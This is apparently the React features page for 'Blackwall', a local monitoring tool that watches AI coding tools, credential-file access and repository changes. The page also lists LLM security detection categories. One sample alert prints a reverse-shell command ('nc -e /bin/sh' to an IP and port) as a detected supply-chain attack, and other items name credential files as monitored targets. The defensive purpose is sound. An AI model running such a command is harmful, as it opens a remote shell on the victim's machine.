import React, { useState } from "react";
import { Link } from "react-router-dom";
import { Shield, Eye, GitBranch, Terminal, Lock, ArrowRight, ChevronDown } from "lucide-react";
import TerminalWindow from "../components/TerminalWindow";
import CopyableCode from "../components/CopyableCode";

const MONITORING_STREAMS = [
  {
    id: "security",
    icon: <Shield size={16} strokeWidth={1.5} className="text-[#ef4444]" />,
    label: "Security Alerts",
    items: [
      "Supply chain attack detection (package manager → suspicious child process)",
      "Credential access monitoring (AI tools reading .env, .aws, .ssh)",
      "Persistence mechanism detection (.bashrc, LaunchAgents modifications)",
      "Network anomalies (DGA domains, public IP literals, suspicious ports)",
      "Prompt injection pattern scanning",
    ],
    term: [
      { c: "text-[#ef4444]", t: "[Critical] Supply Chain Attack" },
      { c: "text-[#52525b]", t: "           npm → nc -e /bin/sh 45.33.32.156:4444" },
      { c: "text-[#f97316]", t: "[High]     ~/.aws/credentials accessed by Cursor" },
      { c: "text-[#eab308]", t: "[Medium]   New network destination: 45.33.32.156" },
    ],
  },
  {
    id: "ai",
    icon: <Eye size={16} strokeWidth={1.5} className="text-[#8b5cf6]" />,
    label: "AI Activity",
    items: [
      "Process lifecycle (launch, network connect, file access)",
      "GUI-launched tool detection (works even without terminal launch)",
      "Network destination tracking (what endpoints are your AI tools calling?)",
      "Session grouping per AI tool session (coming in v2.1)",
    ],
    term: [
      { c: "text-[#71717a]", t: "[Info]   Cursor launched (PID 4821)" },
      { c: "text-[#71717a]", t: "[Info]   Cursor → api.cursor.sh:443 ✓" },
      { c: "text-[#71717a]", t: "[Info]   Cursor → vscode.blob.core.windows.net ✓" },
      { c: "text-[#f97316]", t: "[High]   Cursor → 45.33.32.156 (unknown)" },
    ],
  },
  {
    id: "projects",
    icon: <GitBranch size={16} strokeWidth={1.5} className="text-[#06b6d4]" />,
    label: "Project Changes",
    items: [
      "Git-aware summaries (status, diff --numstat)",
      "Risk tagging (CI workflows, installer scripts, secrets, dependencies)",
      "AI correlation labels (when code changes happen near AI activity)",
      "Cross-repository monitoring",
    ],
    term: [
      { c: "text-[#71717a]", t: "[Info]   main.rs modified (+23 -5)" },
      { c: "text-[#eab308]", t: "[Medium] .github/workflows/ci.yml changed" },
      { c: "text-[#f97316]", t: "[High]   .env.production modified" },
      { c: "text-[#71717a]", t: "         AI-correlated: 30s after Cursor activity" },
    ],
  },
];

const LLM_CATEGORIES = [
  { group: "Authorization & Access", color: "text-[#ef4444]", items: [
    { id: "TOOL_AUTH_MISSING", severity: "High", desc: "LLM can invoke tools without permission checks" },
    { id: "BLIND_TOOL_EXEC", severity: "High", desc: "Backend runs tool calls without validating user privileges" },
    { id: "MODEL_PRIV_ESCALATION", severity: "High", desc: "LLM granted broader access than the user" },
  ]},
  { group: "Data Safety", color: "text-[#f97316]", items: [
    { id: "PROMPT_SECRET_EXPOSURE", severity: "Critical", desc: "API keys embedded in system prompts" },
    { id: "MULTIMODAL_TRUST", severity: "Medium", desc: "OCR/parsed content treated as trusted instructions" },
    { id: "DATA_POISONING_RISK", severity: "High", desc: "User input pollutes training/fine-tuning datasets" },
  ]},
  { group: "Structural Weaknesses", color: "text-[#eab308]", items: [
    { id: "PROMPT_TEMPLATE_INJECTION", severity: "High", desc: "Unsanitized variables in f-string prompts" },
    { id: "ROLE_SEPARATION_FAILURE", severity: "Medium", desc: "User messages can mimic System/Assistant roles" },
    { id: "SCHEMA_VALIDATION_MISSING", severity: "Medium", desc: "No output format enforcement on LLM responses" },
  ]},
  { group: "Shadow Threats", color: "text-[#8b5cf6]", items: [
    { id: "SHADOW_AI_TOOL", severity: "Medium", desc: "Unmonitored AI tool in dependencies" },
    { id: "SHADOW_AI_ENDPOINT", severity: "High", desc: "Code calls undocumented LLM APIs" },
    { id: "SESSION_ISOLATION_WEAKNESS", severity: "High", desc: "Context leakage between users" },
  ]},
];

const OPERATOR_ACTIONS = [
  { group: "Noise Control", kbd: ["a", "i", "m", "u", "t"], actions: [
    { key: "a", label: "Acknowledge", desc: "Mark as reviewed" },
    { key: "i", label: "Ignore session", desc: "Dismiss until restart" },
    { key: "m", label: "Mute", desc: "Suppress this pattern permanently" },
    { key: "u", label: "Unmute", desc: "Reactivate suppressed patterns" },
    { key: "t", label: "Trust", desc: "Create allowlist rule" },
  ]},
  { group: "Investigation", kbd: ["?", "*", "p", "r"], actions: [
    { key: "?", label: "Explain", desc: "Get plain-English context" },
    { key: "*", label: "Star", desc: "Mark for follow-up" },
    { key: "p", label: "View in Projects", desc: "See related code changes" },
    { key: "r", label: "Timeline replay", desc: "Replay event sequence (v2.1)" },
  ]},
  { group: "Export & Compliance", kbd: ["j", "c", "d", "w"], actions: [
    { key: "j", label: "JSON export", desc: "Machine-readable format" },
    { key: "c", label: "CSV export", desc: "Spreadsheet-friendly" },
    { key: "d", label: "Markdown report", desc: "Human-readable report" },
    { key: "w", label: "Webhook forward", desc: "Send to SIEM/Slack" },
  ]},
];

const NON_FEATURES = [
  {
    title: "No Automatic Enforcement",
    body: "Blackwall never kills processes or blocks network connections automatically. You always decide what action to take.",
  },
  {
    title: "No Attribution Claims",
    body: "AI correlation shows temporal proximity — not authorship. If code changes 30 seconds after Cursor connects, we label it 'AI-correlated,' never 'AI-written.'",
  },
  {
    title: "No Cloud Dependencies",
    body: "All monitoring happens locally. All data stays on your machine. Zero telemetry by default. You control what gets exported.",
  },
];

const SEVERITY_BADGE = {
  Critical: "text-[#ef4444] bg-red-950/50 border-red-800/30",
  High:     "text-[#f97316] bg-orange-950/50 border-orange-800/30",
  Medium:   "text-[#eab308] bg-yellow-950/50 border-yellow-800/30",
  Low:      "text-[#3b82f6] bg-blue-950/50 border-blue-800/30",
};

export default function FeaturesPage() {
  const [activeStream, setActiveStream] = useState("security");
  const [openGroup, setOpenGroup] = useState("Authorization & Access");

  const current = MONITORING_STREAMS.find((s) => s.id === activeStream);

  return (
    <div className="min-h-screen bg-[#0a0a0a] pt-14">

      {/* ── Page Header ───────────────────────────── */}
      <section className="max-w-6xl mx-auto px-6 pt-24 pb-16">
        <p className="text-xs font-mono text-[#3f3f46] mb-4">/blackwall/features</p>
        <h1 className="text-4xl md:text-5xl font-medium tracking-tight text-[#ededed] mb-4">
          Monitoring First, Always.
        </h1>
        <p className="text-base text-[#71717a] max-w-xl leading-relaxed">
          Blackwall doesn't fix problems for you. It shows you what's happening so you can make informed decisions. Every feature is designed for observation, not automation.
        </p>
      </section>

      {/* ── Core Monitoring Streams ───────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <div className="mb-10">
            <p className="text-xs font-mono text-[#3f3f46] mb-3">/blackwall/features/streams</p>
            <h2 className="text-2xl md:text-3xl font-medium tracking-tight text-[#ededed] mb-1">
              Three Monitoring Streams
            </h2>
            <p className="text-sm text-[#71717a]">Security, AI Activity, and Project Changes — all in one dashboard.</p>
          </div>

          {/* Stream tabs */}
          <div className="flex gap-0 border border-[#262626] rounded-lg overflow-hidden w-fit mb-8">
            {MONITORING_STREAMS.map((s) => (
              <button
                key={s.id}
                data-testid={`stream-tab-${s.id}`}
                onClick={() => setActiveStream(s.id)}
                className={`flex items-center gap-2 px-4 py-2.5 text-sm transition-colors ${
                  activeStream === s.id
                    ? "bg-[#1a1a1a] text-[#ededed]"
                    : "bg-transparent text-[#71717a] hover:text-[#a1a1aa]"
                }`}
              >
                {s.icon}
                {s.label}
              </button>
            ))}
          </div>

          {/* Stream content */}
          {current && (
            <div className="grid grid-cols-1 lg:grid-cols-2 gap-8 animate-fade-in">
              <div>
                <ul className="space-y-3">
                  {current.items.map((item, i) => (
                    <li key={i} className="flex gap-3 text-sm text-[#71717a]">
                      <span className="text-[#f59e0b] shrink-0 mt-0.5">●</span>
                      {item}
                    </li>
                  ))}
                </ul>
              </div>
              <TerminalWindow title={`blackwall — ${current.label.toLowerCase()}`}>
                {current.term.map((t, i) => (
                  <div key={i} className={`font-mono text-xs ${t.c} leading-6`}>{t.t}</div>
                ))}
              </TerminalWindow>
            </div>
          )}
        </div>
      </section>

      {/* ── LLM Security ──────────────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <div className="mb-10">
            <p className="text-xs font-mono text-[#3f3f46] mb-3">/blackwall/features/llm-security</p>
            <h2 className="text-2xl md:text-3xl font-medium tracking-tight text-[#ededed] mb-2">
              LLM Security Detection
            </h2>
            <p className="text-sm text-[#71717a] max-w-lg">
              12 detection categories for code that interacts with language models. Because your codebase talks to LLMs too.
            </p>
          </div>

          <div className="grid grid-cols-1 md:grid-cols-2 gap-4 mb-10">
            {LLM_CATEGORIES.map((cat) => (
              <div key={cat.group} className="border border-[#1a1a1a] rounded-lg overflow-hidden">
                <button
                  data-testid={`llm-group-${cat.group.replace(/ /g, "-").toLowerCase()}`}
                  className="w-full flex items-center justify-between px-5 py-3.5 hover:bg-[#0d0d0d] transition-colors"
                  onClick={() => setOpenGroup(openGroup === cat.group ? null : cat.group)}
                >
                  <span className={`text-sm font-medium ${cat.color}`}>{cat.group}</span>
                  <ChevronDown
                    size={14}
                    strokeWidth={1.5}
                    className={`text-[#52525b] transition-transform ${openGroup === cat.group ? "rotate-180" : ""}`}
                  />
                </button>
                {openGroup === cat.group && (
                  <div className="border-t border-[#1a1a1a] divide-y divide-[#1a1a1a]">
                    {cat.items.map((item) => (
                      <div key={item.id} className="px-5 py-3 flex items-start gap-3">
                        <code className="text-xs font-mono text-[#71717a] shrink-0 mt-0.5">{item.id}</code>
                        <div className="flex-1 min-w-0">
                          <p className="text-xs text-[#a1a1aa] leading-relaxed">{item.desc}</p>
                        </div>
                        <span className={`text-xs px-2 py-0.5 rounded border font-mono shrink-0 ${SEVERITY_BADGE[item.severity]}`}>
                          {item.severity}
                        </span>
                      </div>
                    ))}
                  </div>
                )}
              </div>
            ))}
          </div>

          {/* Confidence profiles */}
          <div className="grid grid-cols-1 md:grid-cols-3 gap-4">
            {[
              { mode: "Strict", flag: "--strict", desc: "High-confidence detections only. Low noise. For large codebases.", color: "text-[#10b981]" },
              { mode: "Balanced", flag: "--balanced", desc: "Medium confidence. Some false positives possible. Default mode.", color: "text-[#f59e0b]", default: true },
              { mode: "Quiet", flag: "--quiet", desc: "Only critical findings. Minimal alerts. For legacy codebases.", color: "text-[#71717a]" },
            ].map((p) => (
              <div
                key={p.mode}
                data-testid={`confidence-profile-${p.mode.toLowerCase()}`}
                className={`p-5 rounded-lg border ${p.default ? "border-[#f59e0b]/20 bg-[#111111]" : "border-[#1a1a1a] bg-[#0d0d0d]"}`}
              >
                <div className="flex items-center gap-2 mb-2">
                  <span className={`text-sm font-medium ${p.color}`}>{p.mode}</span>
                  {p.default && (
                    <span className="text-xs border border-[#262626] px-1.5 py-0.5 rounded font-mono text-[#52525b]">
                      default
                    </span>
                  )}
                </div>
                <code className="text-xs font-mono text-[#52525b] block mb-2">{p.flag}</code>
                <p className="text-xs text-[#71717a] leading-relaxed">{p.desc}</p>
              </div>
            ))}
          </div>
        </div>
      </section>

      {/* ── Operator Actions ──────────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <div className="mb-10">
            <p className="text-xs font-mono text-[#3f3f46] mb-3">/blackwall/features/actions</p>
            <h2 className="text-2xl md:text-3xl font-medium tracking-tight text-[#ededed] mb-2">
              Observe. Decide. Act.
            </h2>
            <p className="text-sm text-[#71717a]">Keyboard-first actions for every scenario.</p>
          </div>
          <div className="grid grid-cols-1 md:grid-cols-3 gap-6">
            {OPERATOR_ACTIONS.map((group) => (
              <div key={group.group} className="p-5 rounded-lg border border-[#1a1a1a] bg-[#0d0d0d]">
                <p className="text-xs font-mono text-[#f59e0b] mb-4">● {group.group}</p>
                <ul className="space-y-2.5">
                  {group.actions.map((action) => (
                    <li key={action.key} className="flex items-center gap-3">
                      <kbd className="px-2 py-0.5 bg-[#1a1a1a] border border-[#262626] rounded text-xs font-mono text-[#ededed] min-w-[28px] text-center">
                        {action.key}
                      </kbd>
                      <div>
                        <span className="text-sm text-[#a1a1aa]">{action.label}</span>
                        <span className="text-xs text-[#52525b] ml-2">— {action.desc}</span>
                      </div>
                    </li>
                  ))}
                </ul>
              </div>
            ))}
          </div>
        </div>
      </section>

      {/* ── What Blackwall Doesn't Do ─────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-20">
          <div className="mb-10">
            <p className="text-xs font-mono text-[#3f3f46] mb-3">/blackwall/features/non-features</p>
            <h2 className="text-2xl md:text-3xl font-medium tracking-tight text-[#ededed] mb-2">
              Monitoring-First Means No Surprises
            </h2>
            <p className="text-sm text-[#71717a]">Honesty over hype. Here's what Blackwall deliberately doesn't do.</p>
          </div>
          <div className="grid grid-cols-1 md:grid-cols-3 gap-4">
            {NON_FEATURES.map((item, i) => (
              <div
                key={i}
                data-testid={`non-feature-${i}`}
                className="p-6 rounded-lg border border-[#1a1a1a] bg-[#0d0d0d]"
              >
                <div className="flex items-center gap-2 mb-3">
                  <Lock size={14} strokeWidth={1.5} className="text-[#52525b]" />
                  <span className="text-sm font-medium text-[#ededed]">{item.title}</span>
                </div>
                <p className="text-sm text-[#71717a] leading-relaxed">{item.body}</p>
              </div>
            ))}
          </div>
        </div>
      </section>

      {/* ── CTA ───────────────────────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-16 flex flex-col md:flex-row items-center justify-between gap-8">
          <div>
            <h3 className="text-xl font-medium text-[#ededed] mb-1">See all 45+ detection rules</h3>
            <p className="text-sm text-[#71717a]">Every rule documented with MITRE ATT&CK mappings and real examples.</p>
          </div>
          <Link
            to="/detection-catalog"
            data-testid="features-catalog-cta"
            className="flex items-center gap-2 px-5 py-2.5 text-sm border border-[#262626] text-[#ededed] rounded-full hover:border-[#3f3f46] transition-colors shrink-0"
          >
            Detection Catalog <ArrowRight size={14} strokeWidth={1.5} />
          </Link>
        </div>
      </section>
    </div>
  );
}
